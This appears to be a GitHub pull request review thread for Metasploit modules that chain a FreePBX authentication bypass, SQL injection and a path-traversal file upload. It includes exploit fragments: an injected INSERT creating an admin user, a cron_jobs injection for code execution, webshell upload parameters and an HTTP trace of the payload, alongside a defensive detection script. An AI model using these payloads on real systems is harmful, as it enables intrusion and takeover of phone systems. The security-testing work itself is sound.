@msutovsky-r7 msutovsky-r7 commented Jan 5, 2026

This PR adds modules for multiple CVEs (CVE-2025-61675, CVE-2025-61678, CVE-2025-66039). This PR works as a placeholder for now, as the modules are not finished but contain the basic exploitation logic. All modules use the authentication bypass (CVE-2025-66039). CVE-2025-61675 describes multiple SQL injections, but the SQLi modules use only one variant (one for user insertion, the other one for RCE).

WORK IN PROGRESS, TREAT AS SUCH

The CVE-2025-66039 represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user.

The CVE-2025-61675 describes multiple SQL injections; the module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new fake user and effectively grants an attacker access to the administration.

The CVE-2025-61678 allows unrestricted file uploads via firmware upload, including path traversal. These vulnerabilities allow unauthenticated remote code execution by bypassing authentication and placing a webshell in the web server’s directory.

To set up the environment, perform minimal installation from here. Note that Authorization Type needs to be set to webserver:

  1. Login into FreePBX Administration
  2. Settings -> Advanced Settings
  3. Change Authorization Type to webserver
  • Split modules into separate PRs
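
A defender-side check for the request shape described above, added here as an example (it is not code from this PR or from Metasploit). The endpoint and the `id` field are the ones shown in the module code and HTTP trace later in this thread; the host name, user name, digest placeholder and the helper names `parse_request` and `inspect_request` are constructed for illustration.

```ruby
require 'uri'

# A statement separator followed by a data-modifying SQL keyword. A record id
# submitted to the custom extension view never legitimately contains this.
STACKED_SQL = /;\s*(?:insert|update|delete|replace|drop|alter|create)\b/i

Finding = Struct.new(:basic_user, :field, :value)

# Split a raw HTTP/1.x request (as printed by a proxy or an HTTP trace) into
# verb, request target, lower-cased headers and body.
def parse_request(raw)
  head, body = raw.split(/\r?\n\r?\n/, 2)
  lines = head.to_s.lines.map(&:chomp)
  verb, target, = lines.shift.to_s.split(' ', 3)
  headers = lines.each_with_object({}) do |line, acc|
    name, value = line.split(':', 2)
    acc[name.strip.downcase] = value.strip if value
  end
  { verb: verb, target: target, headers: headers, body: body.to_s.strip }
end

# User name carried in a Basic Authorization header, or nil if there is none.
# In webserver authorization mode this is the identity the request claims.
def basic_auth_user(headers)
  match = /\ABasic\s+(\S+)\z/i.match(headers['authorization'].to_s)
  return nil unless match

  match[1].unpack1('m').split(':', 2).first
end

# Return a Finding when the request is a POST to the endpoint module's
# customExt view whose form field `id` carries a stacked SQL statement.
def inspect_request(req)
  return nil unless req[:verb].to_s.casecmp?('POST')

  uri = URI.parse(req[:target].to_s)
  return nil unless uri.path.to_s.end_with?('/admin/config.php')

  query = URI.decode_www_form(uri.query.to_s).to_h
  return nil unless query['display'] == 'endpoint' && query['view'] == 'customExt'

  id = URI.decode_www_form(req[:body]).to_h['id']
  return nil unless id&.match?(STACKED_SQL)

  Finding.new(basic_auth_user(req[:headers]), 'id', id)
rescue URI::InvalidURIError, ArgumentError
  nil # unparseable target or form body: not classified by this check
end

# --- Constructed sample input (not captured traffic) ---
SAMPLE_AUTH = ['pbxuser:notreal'].pack('m0')
SAMPLE_SQL = "1';INSERT INTO ampusers (username, password_sha1, sections) " \
             "VALUES ('example_user', 'SHA1_PLACEHOLDER', '*')#"

def sample_request(id_value)
  <<~REQ
    POST /admin/config.php?display=endpoint&view=customExt HTTP/1.1
    Host: pbx.example.test
    Authorization: Basic #{SAMPLE_AUTH}
    Content-Type: application/x-www-form-urlencoded

    #{URI.encode_www_form('id' => id_value)}
  REQ
end

if __FILE__ == $PROGRAM_NAME
  finding = inspect_request(parse_request(sample_request(SAMPLE_SQL)))
  puts "flagged: user=#{finding.basic_user} #{finding.field}=#{finding.value}" if finding
end
```

The Basic user name in a finding is the account the request claimed to be, which is the value to correlate with unexpected rows in `ampusers`.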

github-actions bot commented Jan 5, 2026

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

super(
update_info(
info,
'Name' => 'FreePB endpoint SQLi to RCE',

Suggested change
'Name' => 'FreePB endpoint SQLi to RCE',
'Name' => 'FreePBX endpoint SQLi to RCE',

super(
update_info(
info,
'Name' => 'FreePBX firmeware file upload',

Suggested change
'Name' => 'FreePBX firmeware file upload',
'Name' => 'FreePBX firmware file upload',

@msutovsky-r7 msutovsky-r7 changed the title from "WIP: Adds modules for multiple CVEs for FreePBX (CVE-2025-61675, CVE-2025-61678, CVE-2025-66039)" to "Adds modules for multiple CVEs for FreePBX (CVE-2025-61675, CVE-2025-61678, CVE-2025-66039)" Jan 7, 2026
@msutovsky-r7 msutovsky-r7 marked this pull request as ready for review January 8, 2026 07:26
info,
'Name' => 'FreePBX Custom Extension SQL Injection',
'Description' => %q{
FreePBX versions prior to 16.0.44 and 17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new fake user and effectively grants an attacker access to the administration.

Suggested change
FreePBX versions prior to 16.0.44 and 17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new fake user and effectively grants an attacker access to the administration.
FreePBX versions prior to 16.0.44 and 17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new administrative user.

)
)
register_options([
OptString.new('USERNAME', [true, 'The valid FreePBX user', 'admin']),

Suggested change
OptString.new('USERNAME', [true, 'The valid FreePBX user', 'admin']),
OptString.new('USERNAME', [true, 'A valid FreePBX user', 'admin']),

authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the
SQL injection in the custom extension component.
The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a
new fake user and effectively grants an attacker access to the administration.

Suggested change
new fake user and effectively grants an attacker access to the administration.
new administrative user.

### USERNAME

Performing authentication bypass requires the username of an existing user.
This username is used in the Authorization header along with a random password.

Suggested change
This username is used in the Authorization header along with a random password.

This line is confusing and necessary in my opinion.

Comment on lines 33 to 39
### FAKE_USERNAME

Username for fake injected user.

### FAKE_PASSWORD

Password for fake injected user.

A quick git grep shows that NEW_USER or/and NEW_USERNAME are the preferred nomenclature.

There is nothing "fake" about the new user.

def exploit
@job_name = Rex::Text.rand_text_alpha(4..7)

rce_payload = 'INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)'
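
Review bot: The `INSERT INTO cron_jobs` statement assembled in `exploit` writes a scheduler row into the target's database, and nothing in these lines ties its removal to the module run. Declare the change under `'SideEffects'` in the module's `Notes` (for example `CONFIG_CHANGES`) and have the documentation name the `cron_jobs` table and the `jobname` column, so whoever runs the test, or reviews the host afterwards, can find and delete the row.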

What if there is already a cronjob with the random name?

@@ -0,0 +1,140 @@
##

What's the point/advantage of this module compared to the cron-based one? Couldn't the two be merged?


register_options(
[
OptString.new('USERNAME', [true, 'The valid FreePBX user', 'admin']),

Suggested change
OptString.new('USERNAME', [true, 'The valid FreePBX user', 'admin']),
OptString.new('USERNAME', [true, 'A valid FreePBX user', 'admin']),

Comment on lines 97 to 106
form_data.add_part(SecureRandom.uuid, nil, nil, 'form-data; name="dzuuid"')
form_data.add_part('0', nil, nil, 'form-data; name="dzchunkindex"')
form_data.add_part(payload.encoded.length.to_s, nil, nil, 'form-data; name="dztotalfilesize"')
form_data.add_part('2000000', nil, nil, 'form-data; name="dzchunksize"')
form_data.add_part('1', nil, nil, 'form-data; name="dztotalchunkcount"')
form_data.add_part('0', nil, nil, 'form-data; name="dzchunkbyteoffset"')
form_data.add_part("../../../var/www/html/#{@target_dir}", nil, nil, 'form-data; name="fwbrand"')
form_data.add_part('1', nil, nil, 'form-data; name="fwmodel"')
form_data.add_part('1', nil, nil, 'form-data; name="fwversion"')
form_data.add_part(payload.encoded, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{@target_payload}"))

Can the values be randomized a bit?

form_data.add_part('2000000', nil, nil, 'form-data; name="dzchunksize"')
form_data.add_part('1', nil, nil, 'form-data; name="dztotalchunkcount"')
form_data.add_part('0', nil, nil, 'form-data; name="dzchunkbyteoffset"')
form_data.add_part("../../../var/www/html/#{@target_dir}", nil, nil, 'form-data; name="fwbrand"')

Is FreePBX always installed in /var/www/?

@msutovsky-r7 msutovsky-r7 changed the title from "Adds modules for multiple CVEs for FreePBX (CVE-2025-61675, CVE-2025-61678, CVE-2025-66039)" to "Adds auxiliary module for FreePBX (CVE-2025-66039, CVE-2025-61678)" Jan 9, 2026
@msutovsky-r7 msutovsky-r7 changed the title from "Adds auxiliary module for FreePBX (CVE-2025-66039, CVE-2025-61678)" to "Adds auxiliary module for FreePBX (CVE-2025-66039, CVE-2025-61675)" Jan 9, 2026
@bwatters-r7 bwatters-r7 self-assigned this Jan 12, 2026
@bwatters-r7

A bit confused for the setup. I downloaded and installed the iso, and it was a linux distro. I created a root password and logged in to a text-based shell environment.
When you say

> perform minimal installation from here.

That's just an iso file that appears to be a linux distro? There are no instructions, but I installed the OS as a vm and it provides a text shell.

> Login into FreePBX Administration

Do you mean the resulting Linux distro's OS text shell? I don't see anything that appears to be a web interface?
The only ports I see open are 22, 53, 11, and 3306, so I'm not sure where this option lives?

@msutovsky-r7

> A bit confused for the setup. I downloaded and installed the iso, and it was a linux distro. I created a root password and logged in to a text-based shell environment.
>
> When you say
>
> > perform minimal installation from here.
>
> That's just an iso file that appears to be a linux distro? There are no instructions, but I installed the OS as a vm and it provides a text shell.
>
> > Login into FreePBX Administration
>
> Do you mean the resulting Linux distro's OS text shell? I don't see anything that appears to be a web interface?
>
> The only ports I see open are 22, 53, 11, and 3306, so I'm not sure where this option lives?

Huh, weird... The Administration should be a web interface on port 80. Let me double check if the ISO works as expected.

@msutovsky-r7

Right, I took a peek at the testing setup, you should see administration setup at http://[IP]/admin/config.php - there, you can configure your admin username/password and move on with the rest of configuration. Let me know how it goes. Sorry for the confusion!

@bwatters-r7

Dang; I was lazy and only looked at the IPv4 listening ports.......
Anyway, I can access the web server:
Thanks!

@msutovsky-r7 msutovsky-r7 force-pushed the exploit/freepbx/injections_rce branch from fff6087 to c56f9d2 Compare January 15, 2026 14:20
[ 'CVE', '2025-66039'], # Authentication Bypass
[ 'CVE', '2025-61675'], # SQL injections
[ 'URL', 'https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/']
],

Do we need to pop on the disclosure date here?

OptString.new('NEW_PASSWORD', [false, 'Password for inserted user']),
])
end
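
Review bot: `NEW_PASSWORD` is registered as optional (`false`) with no default, and its description, 'Password for inserted user', does not say what is used when the option is left unset. State the fallback in the description (for example, that a random value is generated and printed, if that is what the module does) or mark the option required, so the operator always knows which credential ends up in the database.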

@adfoster-r7 adfoster-r7 Jan 15, 2026

Would this benefit from a check method? Or is it not possible to fingerprint/identify the vulnerability ahead of time without side effects 👀

'uri' => normalize_uri('admin', 'config.php'),
'method' => 'POST',
'headers' => {
'Authorization' => basic_auth(datastore['USERNAME'], Rex::Text.rand_text_alphanumeric(6))

(maybe)

Suggested change
'Authorization' => basic_auth(datastore['USERNAME'], Rex::Text.rand_text_alphanumeric(6))
'Authorization' => basic_auth(username, Rex::Text.rand_text_alphanumeric(6))

true
end

def custom_extension_injection(username, password)

Suggested change
def custom_extension_injection(username, password)
def custom_extension_injection(username, password_digest)

'view' => 'customExt'
},
'vars_post' => {
'id' => %<1';INSERT INTO ampusers (username, password_sha1, sections) VALUES ('#{username}', '#{password}', '*')#>

Suggested change
'id' => %<1';INSERT INTO ampusers (username, password_sha1, sections) VALUES ('#{username}', '#{password}', '*')#>
'id' => %<1';INSERT INTO ampusers (username, password_sha1, sections) VALUES ('#{username}', '#{password_digest}', '*')#>

1. Do: `set USERNAME [FreePBX user]`
1. Do: `set FAKE_USERNAME [new username]`
1. Do: `set FAKE_PASSWORD [new password]`
1. Do: `run`

Suggested change
1. Do: `run`
1. Do: `set NEW_USERNAME [new username]`
1. Do: `set NEW_PASSWORD [new password]`

@bwatters-r7 bwatters-r7 Jan 15, 2026

Ugh...... highlighted the wrong line..... FAKE_USERNAME => NEW_USERNAME

bwatters-r7 commented Jan 15, 2026

I'm getting a 401 when performing the database insert?

httptrace
msf auxiliary(gather/freepbx_custom_extension_injection) > show options

Module options (auxiliary/gather/freepbx_custom_extension_injection):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   NEW_PASSWORD  testing1234      no        Password for inserted user
   NEW_USERNAME  msfuser5         no        Username for inserted user
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4
                                            , socks5, socks5h, http, sapni
   RHOSTS        10.5.132.167     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                            metasploit.html
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME      msfuser          yes       A valid FreePBX user
   VHOST                          no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf auxiliary(gather/freepbx_custom_extension_injection) > set httptrace true
httptrace => true
msf auxiliary(gather/freepbx_custom_extension_injection) > run
[*] Running module against 10.5.132.167
[*] Trying to create new administrative user
####################
# Request:
####################
POST /admin/config.php?display=endpoint&view=customExt HTTP/1.1
Host: 10.5.132.167
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Authorization: Basic bXNmdXNlcjpveVFmazM=
Content-Type: application/x-www-form-urlencoded
Content-Length: 186

id=1%27%3bINSERT%20INTO%20ampusers%20%28username%2c%20password_sha1%2c%20sections%29%20VALUES%20%28%27msfuser5%27%2c%20%27af542336022d81f0510c37920fd4461c6f754554%27%2c%20%27%2a%27%29%23
####################
# Response:
####################
HTTP/1.0 401 Unauthorized
Date: Thu, 15 Jan 2026 14:55:59 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16
X-Powered-By: PHP/7.4.16
Last-Modified: Thu, 15 Jan 2026 14:55:59 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: PHPSESSID=t16hbvbkliv1bltocd9q9vo06f; expires=Sat, 14-Feb-2026 14:55:59 GMT; Max-Age=2592000; path=/, lang=en_US
Connection: close
Content-Type: text/html; charset=utf-8

		<i class="fa fa-search"></i>
		<input type="text" class="form-control typeahead" placeholder="Search" title="Quick Search '/'">
	</div>
<div id="page_body">
<br />
			<div style="margin-left:auto; margin-right:auto;text-align:center">This feature is currently not licensed. For more information on this feature or to purchase this Add-On, please see the information below.</div><div class="buy" style="margin-left:auto; margin-right:auto;text-align:center;margin-top:10px;"><button class="fpbx-buy btn" data-rawname="endpoint" style="font-size:24px !important;"><i class="fa fa-money"></i> Buy Now 
			  </button></div><div style="margin: 0 auto; width:100%; height:800px; padding-bottom:10px;">
			<iframe type="text/html" src="//www.freepbx.org/add-ons/#endpoint?vendor=freepbxdistro&module=endpoint" style="width:100%; height:100%; margin:1%;"></iframe>
		</div><script>
var timezone = 'UTC';
var language = 'en_US';
var UIDEFAULTLANG = 'en_US';
var PHPTIMEZONE = 'UTC';
var datetimeformat = 'llll';
var dateformat = 'l';
var timeformat = 'LT';
</script>
</div></div><div id="footer"><hr /><div id="action-bar"><div id="action-buttons"><button id="action-bar-hide" class="btn"><i class="fa fa-angle-double-right"></i></button><input  name="submit" type="submit" value="Save Custom Extension" id="submit" ><input  name="delete" type="submit" value="Remove Custom Extension" id="delete" ></div></div><div id="footer_content" class="row"><div class="col-md-4">
	<a target="_blank" href="http://www.freepbx.org" ><img id="footer_logo1" src="/admin/images/freepbx_small.png?load_version=16.0.33" alt="FreePBX&reg;"/>
	</a>
	</div><div class="col-md-4" id="footer_text"><a href="http://www.freepbx.org" target="_blank">FreePBX</a> is a registered trademark of<br /><a href="http://www.freepbx.org/copyright.html" target="_blank"> Sangoma Technologies Inc.</a><br />FreePBX 16.0.33 is licensed under the <a href="http://www.gnu.org/copyleft/gpl.html" target="_blank"> GPL</a><br /><a href="http://www.freepbx.org/copyright.html" target="_blank">Copyright&copy; 2007-2026</a></div><div class="col-md-4">
	<a target="_blank" href="http://www.sangoma.com" ><img id="footer_logo" src="/admin/images/sangoma-horizontal_thumb.png" alt="www.sangoma.com"/>
	</a>
	</div></div></div>
<script src='modules/sysadmin/assets/js/module-purchasing.js?v=1768488961' onload='freepbxModulePurchasing("https://katanafpbx.schmoozecom.com")' async></script>
<script type="text/javascript">
function addLoadEvent(func) {
  var oldonload = window.onload;
  if (typeof window.onload != 'function') {
    window.onload = func;
  } else {
    window.onload = function() {
      if (oldonload) {
        oldonload();
      }
      func();
    }
  }
}
//call plugin function after DOM ready
addLoadEvent(function(){
  outdatedBrowser({
    bgColor: '#f25648',
    color: '#ffffff',
    lowerThan: 'IE10',
    languagePath: ''
  })
});
</script>
<div id="outdated">
  <h6>Your browser is out-of-date!</h6>
  <p>FreePBX requires a new browser to function correctly. You can still use FreePBX with the browser you currently have but your experience may be diminished and is not supported<a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update my browser now</a></p>
  <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
  
  <script>
  $(window.console).ready(function(){
    console.log(("%c%s"), "color: green; font-size: large","FreePBX");
    console.log(("Thankyou for using %s"),"FreePBX");
    
    console.log("If you find bugs you may file a report at http://issues.freepbx.org");
    console.log("For developer resources visit: http://wiki.freepbx.org/x/BAAQ");
    
    console.log(("Framework: %s"),"16.0.33");
    console.log(("Module Name: %s"),"endpoint");
    console.log(("Module Version: %s"),"16.0.77.1");
    
  });
  </script></body>
</html>

####################
# Request:
####################
POST /admin/ajax.php?module=userman&command=checkPasswordReminder HTTP/1.1
Host: 10.5.132.167
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer: http://10.5.132.167/admin/config.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

username=msfuser5&password=dGVzdGluZzEyMzQ%3d&loginpanel=admin
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Thu, 15 Jan 2026 14:56:01 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16
X-Powered-By: PHP/7.4.16
Set-Cookie: PHPSESSID=gq7tf803hvceiu0s7a4juq99ga; expires=Sat, 14-Feb-2026 14:56:01 GMT; Max-Age=2592000; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Headers: Content-Type, Depth, User-Agent, X-File-Size, X-Requested-With, If-Modified-Since, X-File-Name, Cache-Control, X-Auth-Token
Access-Control-Allow-Methods: POST
Access-Control-Allow-Origin: $url
Access-Control-Max-Age: 86400
Allow: POST
Content-Length: 91
Content-Type: application/json

{"status":true,"message":"Invalid Login Credentials","usertype":"admin","loginfailed":true}
[-] Failed to create new user
[*] Auxiliary module execution completed
msf auxiliary(gather/freepbx_custom_extension_injection) > 

I saw I needed to hit submit and then apply after changing the authorization. Do I need to reboot or restart a service also?

@bwatters-r7 bwatters-r7 removed their assignment Jan 16, 2026